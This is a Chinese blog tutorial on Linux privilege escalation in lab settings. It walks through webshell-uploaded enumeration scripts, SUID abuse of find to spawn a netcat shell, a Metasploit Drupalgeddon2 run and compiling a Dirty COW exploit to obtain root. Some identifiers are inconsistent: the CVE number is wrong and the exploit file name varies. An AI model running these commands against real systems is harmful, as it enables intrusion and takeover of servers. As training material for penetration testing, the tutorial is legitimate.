权限提升-Linux脏牛内核漏洞&SUID&信息收集
2022/3/7 7:18:38
本文主要是介绍权限提升-Linux脏牛内核漏洞&SUID&信息收集,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
一、Linux 提权自动化脚本利用-4 个脚本
两个信息收集:LinEnum,linuxprivchecker 两个漏洞探针:linux-exploit-suggester linux-exploit-suggester2 需要解释:信息收集有什么用哦?漏洞探针又有什么用哦
LinEnum信息收集
通过webshell把LinEnum可执行文件上传到对方服务器中的tmp目录
因为tmp目录是linux服务器中的临时目录,重启后tmp目录会清空,所以这个目录一般都是可读取执行的
通过webshell执行LinEnum.sh文件,如果不能执行,用chmod赋予权限
执行后,会对对方的服务器信息进行检测,可判断是否能通过SUID进行提权
linuxprivchecker信息收集
通过webshell将py文件上传到对方服务器直接通过python运行即可(对方服务器需要有python环境)
linux-exploit-suggester提权
上传到对方服务器后直接执行即可,如果不能执行用chmod赋予权限
linux-exploit-suggester2提权
上传到对方服务器后通过perl执行即可,需要对方服务器上有perl环境
二、什么是SUID提权
SUID就是设置拥有创建文件的用户的身份的其他用户身份,意思是你和创建文件的所有者一样的身份权限。
通过chmod u+s 给文件设置suid
设置完suid后,你就有对此文件的所有权限
如何判断是否有suid提权,可通过上述两个脚本去判断
三、SUID提权演示
首先通过webshell把LinEnum.sh上传到对方服务器tmp目录
用msf来监听本地的5577端口
通过冰蝎将会话反弹到自己msf服务器的5577端口上
msf成功接收到会话
msf执行shell会话
进入tmp目录,给LinEnum.sh赋予执行权限,并执行
查看LinEnum.sh执行后返回的信息是否有可产生shell的程序
也可以直接通过命令find / -perm -u=s -type f 2>/dev/null
查看具有root用户权限的SUID文件
可进行suid提权产利用生shell的程序:nmap,vim,less,more,nano,cp,mv,find
发现find,此处可借助find进行提权
参考:https://pentestlab.blog/2017/09/25/suid-executables/ touch hwj 创建文件夹 find hwj -exec whoami \; 通过find执行whoami命令,因为这里给find服务设置了suid,所以毫无疑问是通过创建find的用户的权限去执行的whoami,也就是通过root的权限去执行的 find hwj -exec netcat -lvp 5555 -e /bin/sh \; 将会话反弹到5555端口 netcat xx.xx.xx.xx 5555 通过netcat去连接msf的5555端口
四、Linux 提权本地配合内核漏洞演示-Mozhe
通过上传linux-exploit-suggester2并执行,列出相应的漏洞列表,对应选择exp执行
提权过程:连接-获取可利用漏洞-下载或上传 EXP-编译 EXP-给权限执行-GG gcc 45010.c -o 45010 chmod +x 45010 ./45010 id
五、Linux 提权脏牛内核漏洞演示-Aliyun,Vulnhub
运行Vulnhub
通过nmap扫描确认目标ip
扫描目标ip的开放端口,发现1898端口
对目标端口进行访问,发现是cms
打开msf搜素drupal相关的漏洞,因为不浪费时间事先知道要用哪个,如果不知道的话可以一个一个尝试
进入对应的漏洞模块,show options显示需要设置哪些参数
设置目标地址以及目标的对应端口,执行,成功反弹会话
getuid查看权限,此时就可以进行提权操作了
通过msf把提权的脚本上传到对方服务器的tmp目录
进入shell会话(shell会话是单纯的linux命令,比较方便)
切换到tmp目录,赋予脚本执行的权限,并执行
执行后返回对方服务器可能存在的提权的漏洞信息,这里我们就选用CVE-2016-5795进行提权
可以直接在反弹的会话用wget下载exp到对方服务器tmp目录,也可以下载到本地通过msf上传
退出shell会话,通过msf把本地的exp上传到对方的tmp目录中
上传到对方tmp目录后,通过g++编译上传的40847.cpp文件,也就是exp
编译后查看结果,dcow为编译后的文件
开启交互式(我也不知道这是什么鸟毛东西,反正就是需要)python -c 'import pty; pty.spawn("/bin/bash")'
然后通过交互回显的会话直接执行dcow文件
下面返回信息,生成root用户的密码(此处不是直接更改root用户密码的意思,是用这个密码也可以登陆root)
生成密码后直接切换root用户,并输入生成的密码
成功登陆root,提权成功
芜湖~~
nmap 192.168.76.0/24 nmap -p1-65535 192.168.76.141 search drupal use exploit/unix/webapp/drupal_drupalgeddon2 set lhost 192.168.76.141 set lport 1898 set target 0 run upload /tmp/40837.cpp /tmp/40837.cpp g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil python -c 'import pty; pty.spawn("/bin/bash")' ./dcow
这篇关于权限提升-Linux脏牛内核漏洞&SUID&信息收集的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-12-18git仓库有更新,jenkins 自动触发拉代码怎么配置的?-icode9专业技术文章分享
- 2024-12-18Jenkins webhook 方式怎么配置指定的分支?-icode9专业技术文章分享
- 2024-12-13Linux C++项目实战入门教程
- 2024-12-13Linux C++编程项目实战入门教程
- 2024-12-11Linux部署Scrapy教程:新手入门指南
- 2024-12-11怎么将在本地创建的 Maven 仓库迁移到 Linux 服务器上?-icode9专业技术文章分享
- 2024-12-10Linux常用命令
- 2024-12-06谁看谁服! Linux 创始人对于进程和线程的理解是…
- 2024-12-04操作系统教程:新手入门及初级技巧详解
- 2024-12-04操作系统入门:新手必学指南